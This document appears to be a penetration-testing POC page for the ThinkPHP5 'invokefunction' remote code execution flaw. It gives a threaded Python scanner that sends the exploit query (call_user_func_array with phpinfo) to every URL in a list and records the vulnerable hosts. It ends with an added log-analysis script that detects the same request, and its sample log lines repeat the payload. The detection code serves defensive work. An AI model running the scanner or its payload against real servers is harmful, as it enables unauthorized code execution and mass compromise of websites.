Penetration_Testing_POC/thinkphp5命令执行.md
2019-07-26 14:42:01 +08:00

### ThinkPHP5 command execution
### POC detection code
```python
# -*- coding:UTF-8 -*-
# env: python2 (the except/print syntax used here also runs under python3)
import requests
import threading
import time
import sys


class check(threading.Thread):  # worker thread: tests whether a single URL is vulnerable
    def __init__(self, url, sem):
        super(check, self).__init__()  # call the threading.Thread constructor; python3 shorthand: super().__init__()
        self.url = url
        self.sem = sem

    def run(self):
        parameters = "s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
        try:
            response = requests.get(url=self.url, params=parameters, timeout=3)
            body = response.text
            if body.find('PHP Extension') != -1:  # phpinfo() output came back, so the route is exposed
                with open("success.txt", "a+") as f1:
                    f1.write("tp5 remote code execution vulnerability present: " + self.url + "\n")
                print("[+] " + self.url)
            else:
                print("[-] " + self.url)
        except Exception as err:
            print("connect failed")
        self.sem.release()  # free the slot once the check finishes so another worker can start


class host(threading.Thread):  # reads the target list and dispatches one worker per URL
    def __init__(self, sem):
        super(host, self).__init__()  # call the threading.Thread constructor; python3 shorthand: super().__init__()
        self.sem = sem

    def run(self):
        with open("url.txt", "r") as f:
            for line in f.readlines():
                self.sem.acquire()  # take one slot per target; blocks once the maximum is reached
                target = line.strip() + "/public/index.php"
                host_thread = check(target, self.sem)
                host_thread.start()  # runs check.run()


if __name__ == '__main__':
    sem = threading.Semaphore(10)  # at most 10 worker threads at once
    thread = host(sem)  # hand the semaphore to the dispatcher
    thread.start()
```
------
Usage: in the current directory, create ./url.txt containing the URLs to check; success.txt will receive the URLs found vulnerable.
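A defender-side counterpart to the POC above, added here and not part of the original repository: a small access-log checker that flags requests carrying the same `\think\app/invokefunction` route the script probes for, including URL-encoded and mixed-case variants. The log lines and client addresses are constructed samples.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOGS = [
    '203.0.113.5 - - [26/Jul/2019:14:42:01 +0800] "GET /public/index.php?s=index/\\think\\app/invokefunction'
    '&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 51234',
    '203.0.113.9 - - [26/Jul/2019:14:43:10 +0800] "GET /public/index.php?s=index/index/index HTTP/1.1" 200 1024',
    # URL-encoded backslashes and mixed case: still the same route after decoding.
    '203.0.113.7 - - [26/Jul/2019:14:44:00 +0800] "GET /public/index.php?s=index/%5Cthink%5CApp/invokefunction'
    '&function=call_user_func_array&vars%5B0%5D=phpinfo HTTP/1.1" 200 51234',
]

# Extracts the request line ("METHOD target HTTP/x.y") from a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Route fragment the POC above sends; matched case-insensitively after URL decoding.
INVOKE_ROUTE = "\\think\\app/invokefunction"


def is_tp5_invokefunction(target):
    """True if the decoded request target contains the invokefunction route.
    Decoding first catches %5C-encoded backslashes; lowercasing catches
    mixed-case class names, which PHP resolves case-insensitively."""
    decoded = unquote(target).lower()
    return INVOKE_ROUTE in decoded


def scan_log_lines(lines):
    """Return (client_ip, function_param) for each line that matches.
    The function= value tells the analyst which PHP callable was requested."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        if not is_tp5_invokefunction(target):
            continue
        query = parse_qs(urlsplit(unquote(target)).query, keep_blank_values=True)
        func = query.get("function", ["<none>"])[0]
        client_ip = line.split(" ", 1)[0]
        hits.append((client_ip, func))
    return hits


if __name__ == "__main__":
    for ip, func in scan_log_lines(SAMPLE_LOGS):
        print("[!] %s requested invokefunction with function=%s" % (ip, func))
```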